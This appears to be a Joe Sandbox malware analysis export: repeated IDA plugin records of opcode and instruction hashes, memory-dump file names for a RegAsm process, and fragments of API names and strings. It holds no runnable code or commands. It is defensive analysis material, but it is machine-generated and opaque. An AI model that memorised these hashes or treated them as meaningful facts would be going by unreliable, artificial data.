                                                                  • Instruction ID: ee6679273abafb4133ad51ca82e03e062317397a14a93a1c8e4187433cc692b4
                                                                  • Opcode Fuzzy Hash: f4242dfef2de233e48016e83545519aca856ea02bbfc6a89d7122ee86ff49502
                                                                  • Instruction Fuzzy Hash: E141C374648300AFF7549B14D881B2BB7A6EB85715F24882EF98947352D339DC20CB5B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MNOP
                                                                  • API String ID: 0-783613192
                                                                  • Opcode ID: 5ced491ab1452905e1841d7bcce19d88781f5803ed5ce9cf4ca693d6db50da8a
                                                                  • Instruction ID: 0a56d986e06c91ed8a12d7fa27a988aa33714531a5a76d730050ec92aa7a375b
                                                                  • Opcode Fuzzy Hash: 5ced491ab1452905e1841d7bcce19d88781f5803ed5ce9cf4ca693d6db50da8a
                                                                  • Instruction Fuzzy Hash: BB418134688340AFF714DB15D881B2BB7A6EB85715F24882DF99997352C339DC20CB5B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 80
                                                                  • API String ID: 0-1093746208
                                                                  • Opcode ID: 4d4fbab07c48a99c042bb332d07d745ff509867459e940bfbc226f5f481d4cde
                                                                  • Instruction ID: 3ec4b7595a72ad0e68ed4e3a28ec28138072276a7513f2fb7a742c8147458005
                                                                  • Opcode Fuzzy Hash: 4d4fbab07c48a99c042bb332d07d745ff509867459e940bfbc226f5f481d4cde
                                                                  • Instruction Fuzzy Hash: 412191746083109BD310AF18D951A2BB7F4EF96764F85491DE4D59B391E338C940CBAB
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 93c2a19666413ab9f400d1b7872a03c7fc96242e82f21e6db902c6c79d7bdab7
                                                                  • Instruction ID: 9a407bdc96c74e76d92ed5144f8a4fe6f1f4e12db280666d0dd749b8afd0197b
                                                                  • Opcode Fuzzy Hash: 93c2a19666413ab9f400d1b7872a03c7fc96242e82f21e6db902c6c79d7bdab7
                                                                  • Instruction Fuzzy Hash: 30529C32518711CBC725DF18D48066BB3E2FFD4304F298A3ED9D6A7295D339A851CB8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e250b38837fd4715581710c8edbcd8addf5a3626a2f5f82d9d280fee6d3a6ce6
                                                                  • Instruction ID: 642af7f9f4cc5c3a0bb655affbc7381b50852d66d18f9bbee6aa8b5c7dd6b660
                                                                  • Opcode Fuzzy Hash: e250b38837fd4715581710c8edbcd8addf5a3626a2f5f82d9d280fee6d3a6ce6
                                                                  • Instruction Fuzzy Hash: 98528070A087848FE7359B24C4847A7BBE1EB91314F14893EC5E656BC2C37DA885C79E
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cc0350b755ec659348fbe488e8fd628042ee9f5c1c3e63c7348debc874760767
                                                                  • Instruction ID: 6f34d658e8bf016dbeb144df8a802002908009c297ca34febf58999a114b199a
                                                                  • Opcode Fuzzy Hash: cc0350b755ec659348fbe488e8fd628042ee9f5c1c3e63c7348debc874760767
                                                                  • Instruction Fuzzy Hash: 4052B531A0C3458FCB15CF14C0906AABBE1BF85314F198A7EE89967391D778E949CF86
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 990ef5858da270fcd5c714f1cbe9946898f94eece37d7b40759dc2b22a897ddf
                                                                  • Instruction ID: b09a89ab5c6bd6caec74fff7b76334741940ee79584cb71c8e44f9d779eadac0
                                                                  • Opcode Fuzzy Hash: 990ef5858da270fcd5c714f1cbe9946898f94eece37d7b40759dc2b22a897ddf
                                                                  • Instruction Fuzzy Hash: 5412BB31A08251CFDB04CF68D8A066FBBF1EF8A315F19882EE58597392D735D910CB96
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 455a2def3cd4607b69d4b082b196bca4304fdf693d3f57c27b18c8d8b9c72b05
                                                                  • Instruction ID: d8883f6032b0fcb3f38433067063a771a19ae62be6b80c3b146bdb5a26dcf8d1
                                                                  • Opcode Fuzzy Hash: 455a2def3cd4607b69d4b082b196bca4304fdf693d3f57c27b18c8d8b9c72b05
                                                                  • Instruction Fuzzy Hash: A2320470915B118FC368CF29C69052ABBF1BF85710B604A2ED6D797B90DB3AF845CB18
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 25a37c5f3b2a29ae68063d4fa164d6ca2caf11f32dc11329077550f3d7966334
                                                                  • Instruction ID: f47fbb57d13c9069d1454bbcb43e8b3ccbc00d4dd581e02e1339e424f1ba8f71
                                                                  • Opcode Fuzzy Hash: 25a37c5f3b2a29ae68063d4fa164d6ca2caf11f32dc11329077550f3d7966334
                                                                  • Instruction Fuzzy Hash: F632623520D380EFC350CF28D880B5FBBE2AF99305F44896DF585962A2D375D968CB5A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4c3c3a21c1b2ee73e811332f6a8e1be64b185d4f77f219ba96861ff91651a30
                                                                  • Instruction ID: 5549ba11c2e90eb234b7c5423a8fbfb4a77ff2f39bf50e673c9bd4f9aa49bd64
                                                                  • Opcode Fuzzy Hash: a4c3c3a21c1b2ee73e811332f6a8e1be64b185d4f77f219ba96861ff91651a30
                                                                  • Instruction Fuzzy Hash: 9D02EDB5A18255CFDB10CF68E8906BEBBB1FF09322F144579D851A7392C339E941CB94
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e0537d3602b05352d162d47d3b37e8bd64bb5caa79fc0b4c4570d86523830f7e
                                                                  • Instruction ID: 3dfa834cc95e5c00a0169a4d3e9d9aa564f73bc0227f910f465499f90f335f9d
                                                                  • Opcode Fuzzy Hash: e0537d3602b05352d162d47d3b37e8bd64bb5caa79fc0b4c4570d86523830f7e
                                                                  • Instruction Fuzzy Hash: 94F1D036608341CFC724CF29C88166BFBE2AFD9304F08892DE4C597791E679E859CB56
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e47e641f6539b63304e02ccc8e37126c79fa7862bb363966f8b44626d7d288a8
                                                                  • Instruction ID: e9468965110a56bb6032bd079094f40f30306602c7693c164a2ba2fb52d1037e
                                                                  • Opcode Fuzzy Hash: e47e641f6539b63304e02ccc8e37126c79fa7862bb363966f8b44626d7d288a8
                                                                  • Instruction Fuzzy Hash: 4FE1363520D380EFC350CF28D88064FBBE1AFD9305F48896DF489972A2D674DA65CB5A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1403e308c14c929368f100250f5dbe3fa0503215152504074aca5edbc24086c7
                                                                  • Instruction ID: 0f752fb7c09d9405a44515831a65da3327b3eea3726c8d910d67014fc478ec9c
                                                                  • Opcode Fuzzy Hash: 1403e308c14c929368f100250f5dbe3fa0503215152504074aca5edbc24086c7
                                                                  • Instruction Fuzzy Hash: FEC158B2A087518FC320CF28C8967ABB7E0EF85318F08492DD5D9D7342D778A555CB8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07db187edf6147d719a46b6995ef8d341e827bc120329527b02f881573074e8e
                                                                  • Instruction ID: 3abc21bc3e95f8a3451e8ced2770bdd05b99c4f40b96798a60550f29323ea1a7
                                                                  • Opcode Fuzzy Hash: 07db187edf6147d719a46b6995ef8d341e827bc120329527b02f881573074e8e
                                                                  • Instruction Fuzzy Hash: D6A1DF75A04246CFDB00CF68E8A166FB7B1FB49312F194479D945A7362C334ED50CB95
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0c87b0577a19f319f0e9110632791b19f836fd9125dd7ec814634750cc2e76d1
                                                                  • Instruction ID: 30348db68d5ad48780b53f830896320fa6a754e42e300085adc231b94485e5cf
                                                                  • Opcode Fuzzy Hash: 0c87b0577a19f319f0e9110632791b19f836fd9125dd7ec814634750cc2e76d1
                                                                  • Instruction Fuzzy Hash: 13A149B45107419FD3218F29D880B57FBF1EF5A304F24491EE4D997392E33AA894CB99
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ce6abbaf5585abdbf9dd583f7fadd13d82129c0f32841ca5fd319ead2268f8f
                                                                  • Instruction ID: 63722bcf266d008e4d2fb854599f640af6bf96e83537b373199111c124b4d8f9
                                                                  • Opcode Fuzzy Hash: 3ce6abbaf5585abdbf9dd583f7fadd13d82129c0f32841ca5fd319ead2268f8f
                                                                  • Instruction Fuzzy Hash: 2E917C716007418FD321CF28D880B67BBF2EF56305F24492ED49697352E739E985CB98
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4cfbc533af8237bfb87faf514cffbbcd245806f9c3fcdb4a2b25e3d0f958fb9c
                                                                  • Instruction ID: a865c3e9e599e2c5329ba543cd513e4d394582e1008898d159b2fc64aeb1c2dc
                                                                  • Opcode Fuzzy Hash: 4cfbc533af8237bfb87faf514cffbbcd245806f9c3fcdb4a2b25e3d0f958fb9c
                                                                  • Instruction Fuzzy Hash: A5811BB2A042106BF724AA29DC4577B76D9EBC0318F04493EF999D7342EA78EC058756
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d573fe2f6a3767f09d46f836eae65ef577eb19577032d8ef79d8b00ea0b12847
                                                                  • Instruction ID: 252b9328507afdb69cb8149bd6720b98ca481bb8e256363331bcbe9542f63dac
                                                                  • Opcode Fuzzy Hash: d573fe2f6a3767f09d46f836eae65ef577eb19577032d8ef79d8b00ea0b12847
                                                                  • Instruction Fuzzy Hash: 64818AB0A00701DFD321DF29D880A66B7F5FF9A304F14496EE58687752E339E845CBA9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d22ac0c0b173eb1919838105268375d851d508c68cd57ff142b5b389bdcbe304
                                                                  • Instruction ID: b2b5ecf074de91ac914dfd965cb03f707f4f16325c0c4ea283c80723a3d79eb4
                                                                  • Opcode Fuzzy Hash: d22ac0c0b173eb1919838105268375d851d508c68cd57ff142b5b389bdcbe304
                                                                  • Instruction Fuzzy Hash: 8F714A742083518BD710DF18D890B2BB7F0FF96744F94192EE4D19B361D3799909CB9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fe22b2f1523c9728c54192698233e5564d6db77466d882a97c05fe3809ff67cf
                                                                  • Instruction ID: 74377abc01be29dba5f3574a8361ef8460b3e5f34b7c9c05be143a1f22df5017
                                                                  • Opcode Fuzzy Hash: fe22b2f1523c9728c54192698233e5564d6db77466d882a97c05fe3809ff67cf
                                                                  • Instruction Fuzzy Hash: C2619A79609302CFD318CF25D8903AAB7E2FB89306F08C97CE984822A5C779D959DF45
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75c3e7660cebeb35403fb5e171a61a3583f9db5666e03dd2ca4b7871bec4d933
                                                                  • Instruction ID: c00be4d41a0304ea6ce13eecc6499725f03711e281a0341f2dbc33ca0e0599d6
                                                                  • Opcode Fuzzy Hash: 75c3e7660cebeb35403fb5e171a61a3583f9db5666e03dd2ca4b7871bec4d933
                                                                  • Instruction Fuzzy Hash: 26515EB19087548FE714DF29D89435BBBE1BBC8318F444A2EE4E587351E379DA088F86
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d72acbbd7377a4364bca26e5100232256b15d0ea39b950b589fe2db1b198ccfd
                                                                  • Instruction ID: cf93265e453f1b4f50de29a8b8c3f842b101a0cdbe79ed852c4bee78df836707
                                                                  • Opcode Fuzzy Hash: d72acbbd7377a4364bca26e5100232256b15d0ea39b950b589fe2db1b198ccfd
                                                                  • Instruction Fuzzy Hash: 6A51193A60979147D718593C5C113B9EA434BAB334F2DA36FF9B2473D1CA1D48065399
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3fb784b57021d17c2da16b2eb1e48beda536bd8e8057a2e69ade5c5409e6bff6
                                                                  • Instruction ID: a8df0a3c83d2a2110b9e98db97d42556f66ce4b46fc752b3147b0d49ab485b89
                                                                  • Opcode Fuzzy Hash: 3fb784b57021d17c2da16b2eb1e48beda536bd8e8057a2e69ade5c5409e6bff6
                                                                  • Instruction Fuzzy Hash: B35190B5A046019FC714DF18C480927B7A1FF85324F19467EF899AB392D639EC42CF9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61d0137ac8db55894e61deab45fae808b6956607a8738703e62f5a3786923e60
                                                                  • Instruction ID: 6773b3426544a07c00623eb10f663d771092178658317beae7ed4357cd2a5b97
                                                                  • Opcode Fuzzy Hash: 61d0137ac8db55894e61deab45fae808b6956607a8738703e62f5a3786923e60
                                                                  • Instruction Fuzzy Hash: 87418A35A14212CFDB44CFA8E9E166EB3B1FB49312F19407AD905A7362C774EE20CB65
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b2b423ebadf1592669d7d863c5a3ee5f5f2eab39b8738c23b7edf78d6bbbe3fc
                                                                  • Instruction ID: 56fe226764b8c279c2f95357b1d9cf27a8c0a2024e96dee972e1ff8b9330b8b4
                                                                  • Opcode Fuzzy Hash: b2b423ebadf1592669d7d863c5a3ee5f5f2eab39b8738c23b7edf78d6bbbe3fc
                                                                  • Instruction Fuzzy Hash: 6E4114722183650FD30CDF39889037ABBD2AB89310F098A3EE5E6C73A1E678C945D715
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit
                                                                  • String ID: !$#$($-$0$2$4$7$8$9$?$?$H$V$e
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit
                                                                  • String ID: 2$a$c$e$f$g$i$q$s$u$w$y${$}
                                                                  APIs
                                                                  • VariantClear.OLEAUT32(04EC839E), ref: 0043733D
                                                                  • VariantInit.OLEAUT32 ref: 0043734C
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit
                                                                  • String ID: 2$a$c$e$f$g$i$q$s$u$w$y${$}
                                                                  Strings
                                                                  Similarity
                                                                  • String ID: 8U!W$AK$D^$I\$L!_#$dE;G
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AllocString
                                                                  • String ID: -$.$/$0$1$3